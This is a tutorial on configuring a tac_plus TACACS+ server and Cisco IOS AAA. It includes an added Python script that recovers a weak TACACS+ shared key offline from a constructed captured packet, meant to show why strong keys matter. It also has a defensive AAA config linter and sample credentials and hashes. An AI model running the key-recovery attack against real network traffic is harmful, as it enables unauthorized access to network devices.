<h1 id="getting-the-tacacs-server-configured"><a href="#getting-the-tacacs-server-configured"><span class="header-section-number">1</span> getting the tacacs+ server configured</a></h1>
<pre><code>$ sudo apt-get install tacacs+
$ sudo groupadd -r cisco
$ sudo vi /etc/tacacs+/tac_plus.conf</code></pre>
<h2 id="change-the-following-settings"><a href="#change-the-following-settings"><span class="header-section-number">1.1</span> change the following settings</a></h2>
<ul>
<li>We want to set the shared key, which every router must present to use our service, to <code>TacacsPassword</code>.</li>
<li>We also want to limit what users may do based on group membership. For this example we keep both the groups and the users in <code>tac_plus.conf</code>.</li>
</ul>
<h2 id="change-this-line"><a href="#change-this-line"><span class="header-section-number">1.2</span> change this line</a></h2>
<pre><code>key = TacacsPassword</code></pre>
<p>In the real world we would choose a much stronger shared key. The key is all that protects the TACACS+ session: packet bodies are only XORed with an MD5-derived pad keyed by it, so anyone who captures the traffic can test candidate keys offline, and a short or guessable key falls quickly. Since the key and the password hashes sit in <code>tac_plus.conf</code> in the clear, keep that file readable by root only. For example:</p>
<pre><code>$ pwgen -s 64 1
BRSWUWgJLkuxyqfmwfrlRC8JW54bpm3a2rMEe1IWwwpupwGBreGCXGTdbqkMGo2F</code></pre>
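<p>To see why the key strength matters, here is an added example in Python (written for this page; it is not code from the page or from tac_plus) that implements the TACACS+ body obfuscation from RFC 8907 section 4.5, builds an authentication START packet the way a router would, and then recovers the key from the "captured" packet by trying candidates offline: a guess is confirmed when the unscrambled body parses as a structurally valid START. The session id, the word list and the captured packets are constructed for the example; the weak key is the page's <code>TacacsPassword</code> and the strong one is the <code>pwgen</code> output above.</p>

```python
import hashlib
import struct
from typing import Iterable, Optional

# TACACS+ constants (RFC 8907)
TAC_PLUS_MAJOR_VER = 0xC
TAC_PLUS_AUTHEN = 0x01            # packet type: authentication
TAC_PLUS_UNENCRYPTED_FLAG = 0x01  # header flag: body sent in the clear
HEADER_FMT = "!BBBBII"            # version, type, seq_no, flags, session_id, length
HEADER_LEN = 12


def pseudo_pad(session_id: int, key: bytes, version: int, seq_no: int, length: int) -> bytes:
    """RFC 8907 s4.5: MD5_1 = MD5(session_id, key, version, seq_no),
    MD5_n = MD5(session_id, key, version, seq_no, MD5_n-1); concatenate the
    digests and truncate to the body length."""
    prefix = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(prefix + prev).digest()
        pad += prev
    return pad[:length]


def obfuscate(body: bytes, session_id: int, key: bytes, version: int, seq_no: int) -> bytes:
    """XOR the body with the pad; the same call scrambles and unscrambles."""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(a ^ b for a, b in zip(body, pad))


def build_authen_start(user: bytes, port: bytes = b"tty1", rem_addr: bytes = b"10.10.9.2",
                       data: bytes = b"", priv_lvl: int = 1) -> bytes:
    """Authentication START body: action=LOGIN(1), authen_type=ASCII(1), service=LOGIN(1)."""
    fixed = struct.pack("!8B", 1, priv_lvl, 1, 1, len(user), len(port), len(rem_addr), len(data))
    return fixed + user + port + rem_addr + data


def build_packet(body: bytes, session_id: int, key: bytes, seq_no: int = 1) -> bytes:
    """Prepend the 12-byte header and obfuscate the body with the shared key."""
    version = (TAC_PLUS_MAJOR_VER << 4) | 0
    header = struct.pack(HEADER_FMT, version, TAC_PLUS_AUTHEN, seq_no, 0, session_id, len(body))
    return header + obfuscate(body, session_id, key, version, seq_no)


def deobfuscate(packet: bytes, key: bytes) -> bytes:
    """Recover the body of a captured packet with a candidate key."""
    version, _ptype, seq_no, flags, session_id, length = struct.unpack(HEADER_FMT, packet[:HEADER_LEN])
    body = packet[HEADER_LEN:HEADER_LEN + length]
    if flags & TAC_PLUS_UNENCRYPTED_FLAG:
        return body
    return obfuscate(body, session_id, key, version, seq_no)


def parse_authen_start(body: bytes) -> Optional[dict]:
    """Return the START fields, or None if the bytes are not a well-formed START.
    A wrong key yields pseudo-random bytes that fail these consistency checks."""
    if len(body) < 8:
        return None
    action, priv_lvl, authen_type, service, ul, pl, rl, dl = struct.unpack("!8B", body[:8])
    valid = (action in (1, 2, 4) and priv_lvl <= 15 and 1 <= authen_type <= 6
             and service <= 9 and 8 + ul + pl + rl + dl == len(body))
    if not valid:
        return None
    fields = {"action": action, "priv_lvl": priv_lvl, "authen_type": authen_type, "service": service}
    off = 8
    for name, n in (("user", ul), ("port", pl), ("rem_addr", rl), ("data", dl)):
        fields[name] = body[off:off + n]
        off += n
    return fields


def recover_key(packet: bytes, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack on one captured START packet."""
    for key in candidates:
        if parse_authen_start(deobfuscate(packet, key)) is not None:
            return key
    return None


# Constructed sample data for this example
SESSION_ID = 0x1A2B3C4D
WEAK_KEY = b"TacacsPassword"
STRONG_KEY = b"BRSWUWgJLkuxyqfmwfrlRC8JW54bpm3a2rMEe1IWwwpupwGBreGCXGTdbqkMGo2F"
WORDLIST = [b"cisco", b"tacacs", b"secret", b"password", b"TacacsPassword", b"Tacacs+"]
START_BODY = build_authen_start(b"sysadm")
WEAK_PACKET = build_packet(START_BODY, SESSION_ID, WEAK_KEY)
STRONG_PACKET = build_packet(START_BODY, SESSION_ID, STRONG_KEY)

if __name__ == "__main__":
    print("weak key recovered:  ", recover_key(WEAK_PACKET, WORDLIST))
    print("strong key recovered:", recover_key(STRONG_PACKET, WORDLIST))
    print("user in START:", parse_authen_start(deobfuscate(WEAK_PACKET, WEAK_KEY))["user"])
```

<p>The attack needs nothing but one captured packet, and the structural check is cheap, so the only cost of guessing is one MD5 per candidate per 16 bytes of body. A dictionary word like the page's example key is found immediately; a 64-character random key is out of reach of any word list, which is the whole argument for the <code>pwgen</code> line above.</p>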
<h2 id="then-at-the-end-of-the-file-....-add"><a href="#then-at-the-end-of-the-file-....-add"><span class="header-section-number">1.3</span> ... then at the end of the file, add:</a></h2>
<pre><code>#
# "level 2" users: full exec privilege (priv-lvl 15) but who cannot
# "configure" or "debug". Note: the cmd stanzas are only consulted if the
# device sends command authorization requests (on IOS that is
# "aaa authorization commands 15 ..."); "service = exec" alone just sets
# the privilege level at login.
#
group = l2_tacacs_users {
    # anything not listed explicitly below is permitted
    default service = permit
    login = file /etc/passwd
    enable = file /etc/passwd
    service = exec {
        priv-lvl = 15
    }
    cmd = configure {
        deny "."
    }
    cmd = debug {
        deny "."
    }
}
#
# "level 2" users with full privileges
#
group = netops {
    default service = permit
    login = file /etc/passwd
    enable = file /etc/passwd
    service = exec {
        priv-lvl = 15
    }
}
#
# group member with an entry in the password file
#
user = sysadm {
    member = netops
}
#
# group member not in the password file:
# use the tac_pwd command to generate the crypt(3) hash
#
user = rancid {
    member = netops
    login = des GAxtUcNh5DBFQ
}</code></pre>
<h3 id="check-tacacs_plus-config"><a href="#check-tacacs_plus-config"><span class="header-section-number">1.3.1</span> check tacacs_plus config</a></h3>
<pre><code>$ sudo service tacacs_plus check</code></pre>
<p>You should see a response like:</p>
<pre><code> * Checking TACACS+ authentication daemon configuration files successful tacacs+</code></pre>
<p>Fix any reported syntax error before restarting: a daemon that fails to start leaves the routers with nothing but their fallback authentication methods.</p>
<h3 id="restart-tacacs_plus-to-pick-up-the-new-settings"><a href="#restart-tacacs_plus-to-pick-up-the-new-settings"><span class="header-section-number">1.3.2</span> restart tacacs_plus to pick up the new settings</a></h3>
<pre><code>$ sudo service tacacs_plus restart</code></pre>
<h1 id="getting-a-cisco-device-to-talk-to-your-tacacs"><a href="#getting-a-cisco-device-to-talk-to-your-tacacs"><span class="header-section-number">2</span> getting a cisco device to talk to your tacacs</a></h1>
<p>Enter configuration mode and define the server and the shared key (it must match the <code>key =</code> line in <code>tac_plus.conf</code>):</p>
<pre><code>tacacs-server host 10.10.9.1
tacacs-server key TacacsPassword</code></pre>
<p>(Later versions of IOS (15.x) define the server with <code>tacacs server NAME</code> and its <code>address ipv4</code> and <code>key</code> sub-commands instead, but the legacy <code>tacacs-server</code> form shown here is still accepted.) Note that <code>service password-encryption</code> only hides the key with the reversible type 7 encoding, so treat the device configuration as sensitive.</p>
<p>Check that you can reach the tacacs server and authenticate correctly:</p>
<pre><code>test aaa group tacacs+ sysadm &lt;password&gt; port 49 legacy</code></pre>
<p>You should see a response like:</p>
<pre><code>Attempting authentication test to server-group tacacs+ using tacacs+
User was successfully authenticated.</code></pre>
<p>If the test fails, check reachability of TCP port 49 first, then the daemon's log on the server: a key mismatch is reported there, not on the router.</p>
<h2 id="now-you-can-finish-configuring-the-router-to-use-tacacs-for-login-control"><a href="#now-you-can-finish-configuring-the-router-to-use-tacacs-for-login-control"><span class="header-section-number">2.1</span> Now you can finish configuring the router to use tacacs for login control:</a></h2>
<pre><code>aaa new-model

! Ask TACACS+ first; fall back to the enable secret (which must be set)
! only if no server answers. A server that rejects the user does NOT
! fall through to the next method.
aaa authentication login default group tacacs+ enable
aaa authentication login NSRCCONSOLE local-case
aaa authentication enable default group tacacs+ enable
! "none" means: if no TACACS+ server answers, allow the session with no
! authorization at all. It keeps you in during a server outage; remove it
! once the setup is trusted.
aaa authorization exec default group tacacs+ none
! Without a commands list the device never asks the server about commands,
! so the cmd = configure / cmd = debug stanzas in tac_plus.conf are ignored
aaa authorization commands 15 default group tacacs+ none
aaa accounting delay-start
aaa accounting exec default start-stop group tacacs+
aaa accounting commands 15 default start-stop group tacacs+

! This lets us login via the console even if tacacs isn't working.
! "secret" stores a hash; "password 0" would keep it in clear text.
username NSRCCONSOLE secret tpyPo9dT
line con 0
 exec-timeout 15 0
 login authentication NSRCCONSOLE</code></pre>
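<p>As an added check (example code written for this page, not an IOS or tac_plus tool), here is a small Python linter for an AAA fragment like the one above. It looks only for the points discussed on this page: <code>aaa new-model</code> present, a command-authorization method list so that the tac_plus <code>cmd</code> stanzas are actually consulted, <code>none</code> fallbacks that open the device when no server answers, and <code>username ... password</code> lines, which store the credential as type 0 or reversible type 7 rather than a hash. The embedded sample is the page's original fragment (before the fixes above); the hardened variant, the checks and their wording are mine.</p>

```python
import re
from typing import List

# Constructed sample: the page's original AAA fragment, as typed on the router
PAGE_CONFIG = """\
aaa new-model
aaa authentication login default group tacacs+ enable
aaa authentication login NSRCCONSOLE local-case
aaa authentication enable default group tacacs+ enable
aaa authorization exec default group tacacs+ none
aaa accounting delay-start
aaa accounting exec default start-stop group tacacs+
aaa accounting commands 15 default start-stop group tacacs+
username NSRCCONSOLE password 0 tpyPo9dT
line con 0
 exec-timeout 15 0
 login authentication NSRCCONSOLE
"""

# The same fragment with the gaps closed (assumed corrections, not from the page):
# command authorization added, "none" replaced by the local user database, hashed secret
HARDENED_CONFIG = PAGE_CONFIG.replace(
    "aaa authorization exec default group tacacs+ none",
    "aaa authorization exec default group tacacs+ local\n"
    "aaa authorization commands 15 default group tacacs+ local",
).replace("password 0 tpyPo9dT", "secret tpyPo9dT")


def config_lines(text: str) -> List[str]:
    """Drop blank lines and IOS '!' comments; strip indentation."""
    return [l.strip() for l in text.splitlines() if l.strip() and not l.lstrip().startswith("!")]


def lint_aaa(text: str) -> List[str]:
    """Return one human-readable finding per problem; an empty list means clean."""
    lines = config_lines(text)
    findings: List[str] = []

    def has(prefix: str) -> bool:
        return any(l.startswith(prefix) for l in lines)

    uses_tacacs = any("group tacacs+" in l for l in lines)

    if not has("aaa new-model"):
        findings.append("missing 'aaa new-model': aaa method lists are ignored until it is set")
    if uses_tacacs and not has("aaa authorization commands 15 "):
        findings.append("no 'aaa authorization commands 15' list: the device never asks the server "
                        "about commands, so tac_plus 'cmd = ...' permit/deny stanzas have no effect")
    for l in lines:
        # a trailing "none" method authorizes everything when no server answers
        if l.startswith("aaa authorization ") and l.split()[-1] == "none":
            findings.append(f"'{l}': the 'none' fallback grants access with no authorization "
                            "whenever no TACACS+ server answers; remove it once the server is trusted")
        # "username X password [0|7] ..." keeps a recoverable credential in the config
        m = re.match(r"username (\S+) password (?:\d+ )?\S+$", l)
        if m:
            findings.append(f"username {m.group(1)}: 'password' stores the credential as clear text "
                            "(type 0) or reversible type 7; use 'username ... secret ...' instead")
    return findings


if __name__ == "__main__":
    for name, cfg in (("page", PAGE_CONFIG), ("hardened", HARDENED_CONFIG)):
        result = lint_aaa(cfg)
        print(f"== {name}: {len(result)} finding(s)")
        for f in result:
            print(" -", f)
```

<p>Run it over <code>show running-config | section aaa|username</code> output pasted into a file; the hardened variant produces no findings, the original fragment produces three.</p>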
<h2 id="now-you-can-verify-accounting"><a href="#now-you-can-verify-accounting"><span class="header-section-number">2.2</span> Now you can verify accounting</a></h2>
<pre><code>Router#show aaa sessions
Router#show aaa users all</code></pre>
<p>On the server, the exec and command records the device sends are written to the file named by the <code>accounting file</code> directive in <code>tac_plus.conf</code>; that log is where you confirm that configuration changes are attributed to individual users rather than to a shared enable password.</p>